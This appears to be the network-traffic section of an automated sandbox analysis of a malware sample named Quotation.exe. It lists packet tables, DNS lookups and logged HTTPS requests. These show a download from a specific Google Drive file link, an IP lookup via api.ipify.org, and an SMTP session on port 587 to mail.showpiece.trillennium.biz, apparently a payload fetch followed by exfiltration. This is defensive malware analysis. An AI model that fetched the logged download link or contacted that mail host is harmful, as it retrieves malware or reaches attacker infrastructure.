Nov 5, 2024 15:07:58.979933023 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.979984999 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.980058908 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.980118036 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.981220961 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.981280088 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.981354952 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.981406927 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.983933926 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.983989954 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:58.984065056 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:58.984110117 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.077727079 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.077872038 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.088593006 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.088700056 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.088727951 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.088789940 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.088794947 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.088841915 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.088846922 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.088885069 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.088888884 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.088934898 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.089176893 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.089235067 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.089289904 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.089338064 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.098988056 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.099050045 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.099057913 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.099215031 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.099904060 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.099950075 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.100032091 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.100073099 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.102848053 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.102899075 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.102930069 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.102972984 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.102979898 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.103018999 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.208034992 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.208132029 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.208157063 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.208194017 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.208209038 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.208241940 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.208383083 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.208439112 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.208740950 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.208796024 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.208801985 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.208848953 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.217866898 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.217936993 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.217942953 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.217987061 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.219010115 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.219059944 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.219115019 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.219162941 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.219166994 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.219213963 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.219381094 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.219432116 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.219436884 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.219482899 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.222014904 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.222060919 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.222067118 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.222104073 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.222218990 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.222260952 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.328409910 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.328530073 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.328655005 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.328707933 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.328738928 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.328782082 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.328885078 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.328927994 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.328936100 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.328980923 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.328984022 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.329020977 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.336765051 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.336817026 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.336822033 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.336863995 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.337987900 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.338038921 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.338042974 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.338082075 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.340848923 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.340903044 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.340903044 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.340913057 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.340945005 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.340984106 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.341080904 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.341129065 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.341135025 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.341183901 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.446846962 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.446917057 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.446957111 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.447000980 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.447010040 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.447058916 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.447120905 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.447164059 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.447169065 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.447216988 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.447571993 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.447623014 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.447628975 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.447676897 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.448070049 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.448118925 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.455765009 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.455821037 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.455826998 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.455872059 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.457263947 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.457314014 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.457753897 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.457807064 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.459988117 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.460041046 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.460064888 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.460072994 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.460093021 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.460129023 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.460246086 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.460294962 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.460653067 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.460701942 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.565732002 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.565876961 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.566061020 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.566109896 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.566119909 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.566165924 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.566169977 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.566214085 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.567603111 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.567646027 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.567651033 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.567693949 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.574609995 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.574659109 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.574724913 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.574769974 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.574775934 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.574820042 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.575175047 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.575218916 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.576436996 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.576483965 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.576507092 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.576550961 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.576555014 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.576591015 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.578759909 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.578804016 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.578916073 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.578954935 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.579138041 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.579178095 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.579571009 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.579610109 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.621108055 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.621162891 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.684715986 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.684778929 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.684782028 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.684799910 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.684822083 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.684864044 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.686619997 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.686672926 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.686698914 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.686743975 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.693774939 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.693830967 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.694839001 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.694885969 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.694892883 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.694921017 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.694924116 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.694931030 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:07:59.694933891 CET	443	49947	142.250.184.225	192.168.2.7
Nov 5, 2024 15:07:59.694982052 CET	49947	443	192.168.2.7	142.250.184.225
Nov 5, 2024 15:08:00.286189079 CET	49977	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:08:00.286240101 CET	443	49977	172.67.74.152	192.168.2.7
Nov 5, 2024 15:08:00.286338091 CET	49977	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:08:00.290081978 CET	49977	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:08:00.290093899 CET	443	49977	172.67.74.152	192.168.2.7
Nov 5, 2024 15:08:00.933928967 CET	443	49977	172.67.74.152	192.168.2.7
Nov 5, 2024 15:08:00.934019089 CET	49977	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:08:00.935672045 CET	49977	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:08:00.935682058 CET	443	49977	172.67.74.152	192.168.2.7
Nov 5, 2024 15:08:00.935962915 CET	443	49977	172.67.74.152	192.168.2.7
Nov 5, 2024 15:08:00.939682961 CET	49977	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:08:00.983341932 CET	443	49977	172.67.74.152	192.168.2.7
Nov 5, 2024 15:08:01.117312908 CET	443	49977	172.67.74.152	192.168.2.7
Nov 5, 2024 15:08:01.117384911 CET	443	49977	172.67.74.152	192.168.2.7
Nov 5, 2024 15:08:01.117433071 CET	49977	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:08:01.123526096 CET	49977	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:08:03.158878088 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:03.163806915 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:03.163944960 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:03.887131929 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:03.887388945 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:03.892340899 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.036858082 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.037050962 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:04.041991949 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.190404892 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.190848112 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:04.195909977 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.360245943 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.360327959 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.360586882 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:04.361793041 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.361836910 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.361846924 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.361893892 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:04.388442993 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:04.393341064 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.538204908 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.540424109 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:04.545485020 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.689522028 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.690587997 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:04.696875095 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.842708111 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:04.843890905 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:04.848856926 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.000154972 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.000464916 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:05.005609035 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.150585890 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.150954962 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:05.156210899 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.303503990 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.303801060 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:05.308806896 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.452995062 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.453632116 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:05.453727961 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:05.453727961 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:05.453728914 CET	49993	587	192.168.2.7	67.23.226.139
Nov 5, 2024 15:08:05.458827019 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.458842039 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.459173918 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.459182978 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.606760025 CET	587	49993	67.23.226.139	192.168.2.7
Nov 5, 2024 15:08:05.651873112 CET	49993	587	192.168.2.7	67.23.226.139

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 15:07:48.987809896 CET	53	57848	162.159.36.2	192.168.2.7
Nov 5, 2024 15:07:49.634295940 CET	53	59947	1.1.1.1	192.168.2.7
Nov 5, 2024 15:07:53.073046923 CET	53767	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:07:53.080282927 CET	53	53767	1.1.1.1	192.168.2.7
Nov 5, 2024 15:07:54.547780991 CET	51103	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:07:54.555398941 CET	53	51103	1.1.1.1	192.168.2.7
Nov 5, 2024 15:08:00.033849955 CET	62374	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:08:00.281764984 CET	53	62374	1.1.1.1	192.168.2.7
Nov 5, 2024 15:08:01.957158089 CET	63010	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:08:02.964685917 CET	63010	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:08:03.157463074 CET	53	63010	1.1.1.1	192.168.2.7
Nov 5, 2024 15:08:03.158066988 CET	53	63010	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 15:07:53.073046923 CET	192.168.2.7	1.1.1.1	0x7f30	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:07:54.547780991 CET	192.168.2.7	1.1.1.1	0x48f2	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:08:00.033849955 CET	192.168.2.7	1.1.1.1	0x14c	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:08:01.957158089 CET	192.168.2.7	1.1.1.1	0xa5fd	Standard query (0)	mail.showpiece.trillennium.biz	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:08:02.964685917 CET	192.168.2.7	1.1.1.1	0xa5fd	Standard query (0)	mail.showpiece.trillennium.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 15:07:53.080282927 CET	1.1.1.1	192.168.2.7	0x7f30	No error (0)	drive.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:07:54.555398941 CET	1.1.1.1	192.168.2.7	0x48f2	No error (0)	drive.usercontent.google.com		142.250.184.225	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:08:00.281764984 CET	1.1.1.1	192.168.2.7	0x14c	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:08:00.281764984 CET	1.1.1.1	192.168.2.7	0x14c	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:08:00.281764984 CET	1.1.1.1	192.168.2.7	0x14c	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:08:03.157463074 CET	1.1.1.1	192.168.2.7	0xa5fd	No error (0)	mail.showpiece.trillennium.biz	showpiece.trillennium.biz		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 15:08:03.157463074 CET	1.1.1.1	192.168.2.7	0xa5fd	No error (0)	showpiece.trillennium.biz		67.23.226.139	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:08:03.158066988 CET	1.1.1.1	192.168.2.7	0xa5fd	No error (0)	mail.showpiece.trillennium.biz	showpiece.trillennium.biz		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 15:08:03.158066988 CET	1.1.1.1	192.168.2.7	0xa5fd	No error (0)	showpiece.trillennium.biz		67.23.226.139	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49936	172.217.18.14	443	1516	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 14:07:54 UTC	216	OUT	GET /uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-05 14:07:54 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 05 Nov 2024 14:07:54 GMT Location: https://drive.usercontent.google.com/download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-HRoSPMaWLOAB3kiUwIwfdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49947	142.250.184.225	443	1516	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 14:07:55 UTC	258	OUT	GET /download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
